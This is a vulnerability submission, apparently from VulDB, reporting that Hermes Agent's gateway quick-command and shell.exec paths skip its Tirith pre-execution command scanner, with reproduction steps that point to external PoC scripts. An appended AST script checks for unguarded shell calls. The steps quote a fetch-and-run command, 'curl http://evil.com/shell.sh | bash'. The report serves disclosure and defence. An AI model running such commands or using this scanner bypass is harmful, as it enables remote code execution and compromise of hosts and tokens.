Submit #845595: NousResearch Hermes Agent 75cbdfd06bb041936f164c8d75ac518b2cb4fec0 Protection Mechanism Failure (CWE-693)

Title: NousResearch Hermes Agent 75cbdfd06bb041936f164c8d75ac518b2cb4fec0 Protection Mechanism Failure (CWE-693)
Description:

# Technical Details

A Pre-Execution Security Scanner Bypass exists in the `command.dispatch` quick-command execution path and the `shell.exec` JSON-RPC method in `tui_gateway/server.py` and `gateway/run.py` of Hermes Agent. The application fails to route gateway shell execution paths through the centralized `check_all_command_guards()` wrapper and the Tirith pre-execution scanner. Quick Commands execute configured shell commands directly with `subprocess.run(..., shell=True)` or `asyncio.create_subprocess_shell()`, while `shell.exec` only applies the simpler `detect_dangerous_command()` matcher and omits Tirith scanning. This bypasses defense-in-depth checks intended to block obfuscated shell payloads, Unicode attacks, homograph attacks, and dangerous pipe chains such as `curl | bash`.

# Vulnerable Code

File: `tui_gateway/server.py`
Method: `command.dispatch`
Why: The quick-command `exec` path runs configured commands with `subprocess.run(..., shell=True)` without invoking `check_all_command_guards()` or the Tirith scanner.

File: `gateway/run.py`
Method: `command.dispatch`
Why: The standard gateway quick-command `exec` path launches commands with `asyncio.create_subprocess_shell()` after only environment sanitization, leaving Tirith checks unenforced.

File: `tui_gateway/server.py`
Method: `shell.exec`
Why: The JSON-RPC shell execution method calls only `detect_dangerous_command()` before shell execution and does not invoke the centralized Tirith-backed guard path.

# Reproduction

1. Run Hermes Agent with the TUI or generic Gateway enabled and Tirith installed/enabled.
2. Download the control script from `https://gist.github.com/YLChen-007/506db0a59d1c85e177dffd166ab29f7a` and run `python3 control-agent_terminal_path.py < /dev/null`.
3. Observe that the secure agent terminal path invokes `check_all_command_guards()` and blocks dangerous commands such as `curl http://evil.com/shell.sh | bash`.
4. Download the bypass PoC from `https://gist.github.com/YLChen-007/0584ffe042773f22eea72ef83c872775`.
5. Run `python3 poc_tirith_bypass.py`.
6. Observe that the same malicious payloads execute through gateway Quick Commands or `shell.exec` without Tirith being called.

# Impact

- Security-control bypass leading to Remote Code Execution with the privileges of the Hermes Agent daemon.
- Attackers with TUI JSON-RPC access or the ability to trigger configured Quick Commands can bypass advanced command scanning.
- Successful exploitation may compromise host infrastructure, API tokens, local files, and service availability.
Source: https://gist.github.com/YLChen-007/3b11589740dcf16b152b0929e1b3d024
User: Eric-a (UID 96353)
Submission: 06/02/2026 03:34 (1 month ago)
Moderation: 07/03/2026 19:07 (1 month later)
Status: Accepted
VulDB entry: 376141 [NousResearch hermes-agent up to 0.15.2 tui_gateway/server.py shell.exec protection mechanism]
Points: 20
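
The gap described under Technical Details can be caught in review with a static check. The following is an added example, not Hermes Agent code: it flags functions that reach `subprocess.*(..., shell=True)` or `asyncio.create_subprocess_shell()` without calling `check_all_command_guards()`. The sample function names and the guard's call shape are assumptions constructed for illustration.

```python
import ast

GUARD = "check_all_command_guards"      # central guard named in the report
ASYNC_SINK = "create_subprocess_shell"  # asyncio sink named in the report
SUBPROCESS_FUNCS = {"run", "Popen", "call", "check_call", "check_output"}

# Constructed sample: three unguarded paths like those reported, one guarded path.
SAMPLE = '''
import asyncio, subprocess

def quick_command_exec(cmd):
    return subprocess.run(cmd, shell=True, capture_output=True)

async def gateway_quick_command(cmd, env):
    return await asyncio.create_subprocess_shell(cmd, env=env)

def shell_exec(cmd):
    if detect_dangerous_command(cmd):
        raise PermissionError(cmd)
    return subprocess.run(cmd, shell=True)

def terminal_exec(cmd):
    check_all_command_guards(cmd)
    return subprocess.run(cmd, shell=True)
'''

def _name(call):
    f = call.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def _is_shell_sink(call):
    shell_true = any(kw.arg == "shell" and getattr(kw.value, "value", None) is True
                     for kw in call.keywords)
    return _name(call) == ASYNC_SINK or (_name(call) in SUBPROCESS_FUNCS and shell_true)

def unguarded_shell_sinks(source):
    """List (function, line, sink) for shell sinks in functions that never call GUARD."""
    findings = []
    for fn in ast.walk(ast.parse(source)):
        if isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            calls = [n for n in ast.walk(fn) if isinstance(n, ast.Call)]
            if not any(_name(c) == GUARD for c in calls):
                findings += [(fn.name, c.lineno, _name(c)) for c in calls if _is_shell_sink(c)]
    return findings

if __name__ == "__main__":
    for func, line, sink in unguarded_shell_sinks(SAMPLE):
        print(f"{func}:{line}: {sink} reached without {GUARD}()")
```

The check only confirms that the guard is called somewhere in the same function. It does not prove the call precedes the sink or that its verdict is enforced, so flagged and unflagged paths both still need manual review.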
